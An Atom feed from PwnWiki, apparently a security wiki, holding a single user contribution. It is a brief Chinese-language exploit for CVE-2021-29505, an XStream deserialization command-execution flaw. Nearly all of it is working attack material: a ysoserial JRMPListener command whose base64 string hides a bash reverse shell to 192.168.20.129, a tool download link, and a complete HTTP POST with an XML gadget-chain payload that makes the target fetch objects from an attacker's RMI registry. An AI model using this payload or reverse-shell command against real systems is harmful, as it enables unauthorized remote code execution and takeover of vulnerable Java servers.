<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bios</id>
	<title>PwnWiki - User contributions [Chinese]</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bios"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Special:Contributions/Bios"/>
	<updated>2026-04-04T14:15:08Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Talk:Mw-mainpage-url&amp;diff=3736</id>
		<title>Talk:Mw-mainpage-url</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Talk:Mw-mainpage-url&amp;diff=3736"/>
		<updated>2021-05-31T03:06:03Z</updated>

		<summary type="html">&lt;p&gt;Bios: CVE-2021-29505：XStream反序列化命令执行漏洞&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;攻击机启动启动一个恶意的RMI Registry：&lt;br /&gt;
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 &amp;quot;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}&amp;quot;&lt;br /&gt;
工具下载链接(https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)&lt;br /&gt;
&lt;br /&gt;
然后对目标机器发送poc：&lt;br /&gt;
POST / HTTP/1.1 &lt;br /&gt;
Host: 192.168.20.129:8080 &lt;br /&gt;
Accept-Encoding: gzip, deflate &lt;br /&gt;
Accept: */* &lt;br /&gt;
Accept-Language: en &lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: application/xml &lt;br /&gt;
Content-Length: 3117 &lt;br /&gt;
&amp;lt;java.util.PriorityQueue serialization='custom'&amp;gt;    &amp;lt;unserializable-parents/&amp;gt;&lt;br /&gt;
    &amp;lt;java.util.PriorityQueue&amp;gt;&lt;br /&gt;
        &amp;lt;default&amp;gt;&lt;br /&gt;
            &amp;lt;size&amp;gt;2&amp;lt;/size&amp;gt;&lt;br /&gt;
        &amp;lt;/default&amp;gt;&lt;br /&gt;
        &amp;lt;int&amp;gt;3&amp;lt;/int&amp;gt;&lt;br /&gt;
        &amp;lt;javax.naming.ldap.Rdn_-RdnEntry&amp;gt;&lt;br /&gt;
            &amp;lt;type&amp;gt;12345&amp;lt;/type&amp;gt;&lt;br /&gt;
            &amp;lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&amp;gt;&lt;br /&gt;
                &amp;lt;m__obj class='string'&amp;gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content&amp;lt;/m__obj&amp;gt;&lt;br /&gt;
            &amp;lt;/value&amp;gt;&lt;br /&gt;
        &amp;lt;/javax.naming.ldap.Rdn_-RdnEntry&amp;gt;&lt;br /&gt;
        &amp;lt;javax.naming.ldap.Rdn_-RdnEntry&amp;gt;&lt;br /&gt;
            &amp;lt;type&amp;gt;12345&amp;lt;/type&amp;gt;&lt;br /&gt;
            &amp;lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&amp;gt;&lt;br /&gt;
                &amp;lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&amp;gt;&lt;br /&gt;
                    &amp;lt;parsedMessage&amp;gt;true&amp;lt;/parsedMessage&amp;gt;&lt;br /&gt;
                    &amp;lt;soapVersion&amp;gt;SOAP_11&amp;lt;/soapVersion&amp;gt;&lt;br /&gt;
                    &amp;lt;bodyParts/&amp;gt;&lt;br /&gt;
                    &amp;lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&amp;gt;&lt;br /&gt;
                        &amp;lt;attachmentsInitialized&amp;gt;false&amp;lt;/attachmentsInitialized&amp;gt;&lt;br /&gt;
                        &amp;lt;nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&amp;gt;&lt;br /&gt;
                            &amp;lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&amp;gt;&lt;br /&gt;
                                &amp;lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&amp;gt;&lt;br /&gt;
                                    &amp;lt;names&amp;gt;&lt;br /&gt;
                                        &amp;lt;string&amp;gt;aa&amp;lt;/string&amp;gt;&lt;br /&gt;
                                        &amp;lt;string&amp;gt;aa&amp;lt;/string&amp;gt;&lt;br /&gt;
                                    &amp;lt;/names&amp;gt;&lt;br /&gt;
                                    &amp;lt;ctx&amp;gt;&lt;br /&gt;
                                        &amp;lt;environment/&amp;gt;&lt;br /&gt;
                                        &amp;lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&amp;gt;&lt;br /&gt;
                                            &amp;lt;java.rmi.server.RemoteObject&amp;gt;&lt;br /&gt;
                                                &amp;lt;string&amp;gt;UnicastRef&amp;lt;/string&amp;gt;&lt;br /&gt;
                                                &amp;lt;string&amp;gt;192.168.20.128&amp;lt;/string&amp;gt;&lt;br /&gt;
                                                &amp;lt;int&amp;gt;1099&amp;lt;/int&amp;gt;&lt;br /&gt;
                                                &amp;lt;long&amp;gt;0&amp;lt;/long&amp;gt;&lt;br /&gt;
                                                &amp;lt;int&amp;gt;0&amp;lt;/int&amp;gt;&lt;br /&gt;
                                                &amp;lt;long&amp;gt;0&amp;lt;/long&amp;gt;&lt;br /&gt;
                                                &amp;lt;short&amp;gt;0&amp;lt;/short&amp;gt;&lt;br /&gt;
                                                &amp;lt;boolean&amp;gt;false&amp;lt;/boolean&amp;gt;&lt;br /&gt;
                                            &amp;lt;/java.rmi.server.RemoteObject&amp;gt;&lt;br /&gt;
                                        &amp;lt;/registry&amp;gt;&lt;br /&gt;
                                        &amp;lt;host&amp;gt;192.168.20.128&amp;lt;/host&amp;gt;&lt;br /&gt;
                                        &amp;lt;port&amp;gt;1099&amp;lt;/port&amp;gt;&lt;br /&gt;
                                    &amp;lt;/ctx&amp;gt;&lt;br /&gt;
                                &amp;lt;/candidates&amp;gt;&lt;br /&gt;
                            &amp;lt;/aliases&amp;gt;&lt;br /&gt;
                        &amp;lt;/nullIter&amp;gt;&lt;br /&gt;
                    &amp;lt;/sm&amp;gt;&lt;br /&gt;
                &amp;lt;/message&amp;gt;&lt;br /&gt;
            &amp;lt;/value&amp;gt;&lt;br /&gt;
        &amp;lt;/javax.naming.ldap.Rdn_-RdnEntry&amp;gt;&lt;br /&gt;
    &amp;lt;/java.util.PriorityQueue&amp;gt;&lt;br /&gt;
&amp;lt;/java.util.PriorityQueue&amp;gt;&lt;/div&gt;</summary>
		<author><name>Bios</name></author>
	</entry>
</feed>